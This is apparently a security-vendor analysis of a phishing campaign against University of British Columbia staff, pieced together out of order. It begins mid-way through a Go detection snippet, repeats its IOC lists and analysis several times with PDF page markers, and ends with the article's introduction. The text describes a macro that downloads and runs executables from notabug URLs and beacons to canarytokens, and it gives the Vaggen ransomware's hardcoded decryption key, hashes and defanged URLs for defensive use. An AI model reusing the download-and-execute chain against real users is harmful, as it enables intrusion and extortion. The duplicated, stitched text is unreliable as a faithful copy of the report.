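const sampleEvents = `
{"kind":"network","image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","dest_host":"notabug.org"}
{"kind":"process","parent_image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","image":"C:\\Users\\alice\\AppData\\Roaming\\Byxor\\Killar.exe"}
{"kind":"network","image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","dest_host":"canarytokens.com"}
{"kind":"process","parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Users\\alice\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe"}
{"kind":"network","image":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","dest_host":"canarytokens.com"}
`

func main() {
	alerts, err := scan(sampleEvents)
	if err != nil {
		panic(err)
	}
	for _, a := range alerts {
		fmt.Println("ALERT:", a)
	}
}
```

The process rule is the stronger of the two: Word has no business being the parent of a freshly written executable under AppData\Roaming, whatever the file is called. The network rule is weaker on its own, since canarytokens.com is also used defensively and notabug.org hosts plenty of legitimate code, so treat it as corroboration and extend the image check to the other Office binaries if the campaign you are hunting switches to Excel or PowerPoint.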
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.

Vaggen ransomware

After being deployed, the ransomware starts encrypting the user's files, adding the .VAGGEN extension to each of them. When the encryption process is finished, it drops a ransom note on the Desktop demanding a payment equivalent to 80 USD in Bitcoin.

The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, which starts with the function denoted as 'main_main' (Go's main.main, the program entry point).

Other functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA. Their actual roles, recovered from what they do:

main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen

A full list of the functions, along with their RVAs, can be found here.

Some of the strings used by the malware (e.g. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded ("STALKER"). At the end of the execution, the ransom note is dropped on the Desktop.

Encrypting and renaming of the files is implemented as the callback of the standard Go function filepath.Walk (from the path/filepath package).

Files are encrypted with AES-256 (32-byte key) in GCM mode. The encryption algorithm is similar to the one demonstrated here.
Using a hardcoded key and a 12-byte nonce generated by CryptGenRandom, the file content is encrypted with the gcm.Seal function.

The output file (with the .VAGGEN extension) contains:

- the 12-byte nonce
- the encrypted content
- the 16-byte GCM tag

The hardcoded key "du_tar_mitt_hjart_mina_pengarna0" found inside the malware code is Swedish for "you take my heart my money". Using this key, we can easily decrypt the content.

With all these elements, we can recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at the Bitcoin address given in the ransom note.

Unusually low ransom amount

Based on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily: the same key is baked into every copy of the binary, rather than a per-victim key protected by an attacker-held public key, so anyone with a sample can decrypt any victim's files.

However, the phishing attack was well conceived and the template looks well designed, with the nice touch of adding canary tokens. It's unclear at this point whether the University of British Columbia was the sole target.

Crawling additional repositories created by the threat actor, we found other Word template files that used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.

We are grateful for the information shared with us by the University of British Columbia.
This allowed us to paint a better picture of this attack and understand who the targets were.

Malwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.

IOCs

Variant 1:
summerofficetemplate.dotm
634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 2:
UBC-COVID19-Survey-Mandatory.docx
e869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3
template.dotm
334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
canarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
canarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
polisen.exe
03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf
killar.exe
43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f

Variant 3:
template1.dotm
225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4
notabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe
notabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe
canarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php
canarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp

Variant 4:
smoothtemplates.dotm
ada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1
notabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe
notabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe
canarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html
canarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html
alderson.exe
b4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6
irving.exe
00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe

Variant 5:
template.dotm
7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe
notabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe
canarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp
canarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php
mrmonster.exe
f42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23
mrclean.exe
71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 679 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 680 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 681 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 682 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 683 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 684 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 685 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 686 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 687 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 688 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 689 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 690 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 691 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 692 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 693 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 694 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 695 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 696 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 697 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 698 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 699 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 700 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 701 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 702 of 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.
In recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group.
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.
However, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.
On discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.
Mandatory COVID-19 survey distributed to targeted recipients
The attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality of these platforms to distribute it.
This was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. By comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.
The attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):
Good evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more.
Please fill it out ASAP!
You will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!
In advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!
According to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file, since it was shared privately rather than publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.
Phishing document analysis
The phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro.
That file was uploaded to a free code hosting website (notabug.org).
When the macro is executed, it does the following:
- Gets the %APPDATA% directory
- Creates the Byxor directory in %APPDATA%
- Downloads a file from the following URL and writes it as Polisen.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe
- Downloads a file from the following URL and writes it as Killar.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe
- Calls the Shell function to execute killar.exe
- Checks the return value of the Shell function to see whether it was successful (the return value would be the task ID of the executed application)
- If successful, it sends a GET HTTP request to: canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp
- If it isn’t successful, it sends a GET HTTP request to: canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html
We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.
